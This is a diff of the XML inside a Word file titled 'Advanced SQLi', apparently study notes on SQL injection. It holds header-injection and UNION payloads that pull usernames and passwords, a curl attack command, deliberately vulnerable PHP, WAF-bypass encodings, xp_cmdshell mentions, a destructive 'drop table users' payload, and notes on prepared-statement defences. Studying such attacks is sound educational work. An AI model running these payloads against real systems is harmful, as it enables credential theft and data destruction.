--- a/Advanced SQLi.docx
+++ b/Advanced SQLi.docx
@@ -53,15 +53,39 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>HTTP Header Injection (User-Agent, Referer or X-Forwarded-For)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-      <w:r>
-        <w:t>User-Agent: ‘ OR 1=1; --</w:t>
+        <w:t xml:space="preserve">HTTP Header Injection (User-Agent, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Referer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> or X-Forwarded-For)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">User-Agent: </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>‘ OR</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 1=1; --</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -95,7 +119,15 @@
         <w:spacing w:after="0"/>
       </w:pPr>
       <w:r>
-        <w:t>User-Agent: ‘ UNION SELECT username, password FROM user; --</w:t>
+        <w:t xml:space="preserve">User-Agent: </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>‘ UNION</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> SELECT username, password FROM user; --</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -122,35 +154,105 @@
         <w:rPr>
           <w:color w:val="002060"/>
         </w:rPr>
-        <w:t>$userAgent = $_SERVER['HTTP_USER_AGENT'];</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:color w:val="002060"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="002060"/>
-        </w:rPr>
-        <w:t>$insert_sql = "INSERT INTO logs (user_Agent) VALUES ('$userAgent')";</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:color w:val="002060"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="002060"/>
-        </w:rPr>
-        <w:t>if ($conn-&gt;query($insert_sql) === TRUE) {</w:t>
+        <w:t>$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="002060"/>
+        </w:rPr>
+        <w:t>userAgent</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="002060"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = $_SERVER['HTTP_USER_AGENT'];</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:color w:val="002060"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="002060"/>
+        </w:rPr>
+        <w:t>$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="002060"/>
+        </w:rPr>
+        <w:t>insert_sql</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="002060"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = "INSERT INTO logs (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="002060"/>
+        </w:rPr>
+        <w:t>user_Agent</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="002060"/>
+        </w:rPr>
+        <w:t>) VALUES ('$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="002060"/>
+        </w:rPr>
+        <w:t>userAgent</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="002060"/>
+        </w:rPr>
+        <w:t>')";</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:color w:val="002060"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="002060"/>
+        </w:rPr>
+        <w:t>if ($conn-&gt;query($</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="002060"/>
+        </w:rPr>
+        <w:t>insert_sql</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="002060"/>
+        </w:rPr>
+        <w:t>) === TRUE) {</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -192,7 +294,85 @@
         <w:rPr>
           <w:color w:val="002060"/>
         </w:rPr>
-        <w:t xml:space="preserve">    echo "&lt;p class='text-red-500'&gt;Error: " . $conn-&gt;error . " (Error Code: " . $conn-&gt;errno . ")&lt;/p&gt;";</w:t>
+        <w:t xml:space="preserve">    echo "&lt;p class='text-red-500'&gt;Error: </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="002060"/>
+        </w:rPr>
+        <w:t>" .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="002060"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $conn-&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="002060"/>
+        </w:rPr>
+        <w:t>error .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="002060"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> " (Error Code: </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="002060"/>
+        </w:rPr>
+        <w:t>" .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="002060"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $conn-&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="002060"/>
+        </w:rPr>
+        <w:t>errno</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="002060"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="002060"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="002060"/>
+        </w:rPr>
+        <w:t>")&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="002060"/>
+        </w:rPr>
+        <w:t>/p&gt;";</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -228,7 +408,49 @@
         <w:rPr>
           <w:color w:val="002060"/>
         </w:rPr>
-        <w:t>$sql = "SELECT * FROM logs WHERE user_Agent = '$userAgent'";</w:t>
+        <w:t>$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="002060"/>
+        </w:rPr>
+        <w:t>sql</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="002060"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = "SELECT * FROM logs WHERE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="002060"/>
+        </w:rPr>
+        <w:t>user_Agent</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="002060"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = '$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="002060"/>
+        </w:rPr>
+        <w:t>userAgent</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="002060"/>
+        </w:rPr>
+        <w:t>'";</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -277,15 +499,39 @@
         <w:spacing w:after="0"/>
       </w:pPr>
       <w:r>
-        <w:t>Preparing the payload: ‘ UNION SELECT username, password FROM user; #</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">curl -H “User-Agent: ‘ UNION SELECT username, password FROM user; # ” </w:t>
+        <w:t xml:space="preserve">Preparing the payload: </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>‘ UNION</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> SELECT username, password FROM user; #</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">curl -H “User-Agent: </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>‘ UNION</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> SELECT username, password FROM user; </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t># ”</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:hyperlink r:id="rId6" w:history="1">
         <w:r>
@@ -349,15 +595,28 @@
       </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve"> CREATE PROCEDURE sp_getUserData</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    @username NVARCHAR(50)</w:t>
+        <w:t xml:space="preserve"> CREATE PROCEDURE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sp_getUserData</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">    @username </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>NVARCHAR(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>50)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -381,7 +640,15 @@
         <w:spacing w:after="0"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">    DECLARE @sql NVARCHAR(4000)</w:t>
+        <w:t xml:space="preserve">    DECLARE @sql </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>NVARCHAR(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>4000)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -621,8 +888,13 @@
         </w:numPr>
         <w:spacing w:after="0"/>
       </w:pPr>
-      <w:r>
-        <w:t>SQLMap – open-source, web app;</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>SQLMap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> – open-source, web app;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -634,8 +906,13 @@
         </w:numPr>
         <w:spacing w:after="0"/>
       </w:pPr>
-      <w:r>
-        <w:t>SQLNinja – web app that use Microsoft SQL Server;</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>SQLNinja</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> – web app that use Microsoft SQL Server;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -715,8 +992,13 @@
         </w:numPr>
         <w:spacing w:after="0"/>
       </w:pPr>
-      <w:r>
-        <w:t>Parameterised Queries and Prepared Statement;</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Parameterised</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Queries and Prepared Statement;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -725,7 +1007,55 @@
       </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>Ex: in PHP, with PDO: $stmt = $pdo-&gt;prepare(“SELECT * FROM users WHERE username = :username”); $stmt-&gt;execute([‘username’ =&gt; $username]);</w:t>
+        <w:t>Ex: in PHP, with PDO: $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>stmt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>pdo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>-&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>prepare(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">“SELECT * FROM users WHERE username </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>= :username</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>”); $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>stmt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>-&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>execute(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>[‘username’ =&gt; $username]);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -743,15 +1073,49 @@
         <w:spacing w:after="0"/>
       </w:pPr>
       <w:r>
-        <w:t>Input Validation and Sanitisation;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Htmlspecialchars(), filter_var() – to validate data types, lengths and ranges</w:t>
+        <w:t xml:space="preserve">Input Validation and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Sanitisation</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Htmlspecialchars</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">), </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>filter_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>var</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>) – to validate data types, lengths and ranges</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -829,7 +1193,15 @@
         <w:spacing w:after="0"/>
       </w:pPr>
       <w:r>
-        <w:t>Exploiting Database-Specific Features (understand the specifics of the target DBMS – MySQL, PostgreSQL, Oracle or MSSQL – supports the xp_cmdshell);</w:t>
+        <w:t xml:space="preserve">Exploiting Database-Specific Features (understand the specifics of the target DBMS – MySQL, PostgreSQL, Oracle or MSSQL – supports the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>xp_cmdshell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -842,7 +1214,15 @@
         <w:spacing w:after="0"/>
       </w:pPr>
       <w:r>
-        <w:t>Leveraging Error Messages (1’ AND 1=CONVERT(int, (SELECT @@version)) --);</w:t>
+        <w:t>Leveraging Error Messages (1’ AND 1=</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>CONVERT(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>int, (SELECT @@version)) --);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -855,28 +1235,86 @@
         <w:spacing w:after="0"/>
       </w:pPr>
       <w:r>
-        <w:t>Bypassing WAF and filters (SeLeCt</w:t>
-      </w:r>
+        <w:t>Bypassing WAF and filters (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>SeLeCt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve">; </w:t>
       </w:r>
       <w:r>
-        <w:t>CONCAT(CHAR(83),CHAR(69),CHAR(76),CHAR(</w:t>
+        <w:t>CONCAT(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>CHAR(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>83</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>),CHAR</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>(69</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>),CHAR</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>(76</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>),CHAR</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>(</w:t>
       </w:r>
       <w:r>
         <w:t>69</w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>)</w:t>
       </w:r>
       <w:r>
-        <w:t>,CHAR(67),CHAR(84)</w:t>
+        <w:t>,CHAR</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>(67</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>),CHAR</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>(84)</w:t>
       </w:r>
       <w:r>
         <w:t>)</w:t>
       </w:r>
       <w:r>
-        <w:t>; hex, URL encoding, inline commnets /**/, different character encodings %09, %0A</w:t>
+        <w:t xml:space="preserve">; hex, URL encoding, inline </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>commnets</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> /**/, different character encodings %09, %0A</w:t>
       </w:r>
       <w:r>
         <w:t>);</w:t>
@@ -892,7 +1330,15 @@
         <w:spacing w:after="0"/>
       </w:pPr>
       <w:r>
-        <w:t>Database Fingerprinting (SELECT version() – PostgreSQL; SELECT @@version – MySQL and MSSQL);</w:t>
+        <w:t xml:space="preserve">Database Fingerprinting (SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>version(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>) – PostgreSQL; SELECT @@version – MySQL and MSSQL);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -907,6 +1353,42 @@
       <w:r>
         <w:t>Pivoting with SQLi.</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Payloads: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>drop table users -- -</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="12240" w:h="15840"/>
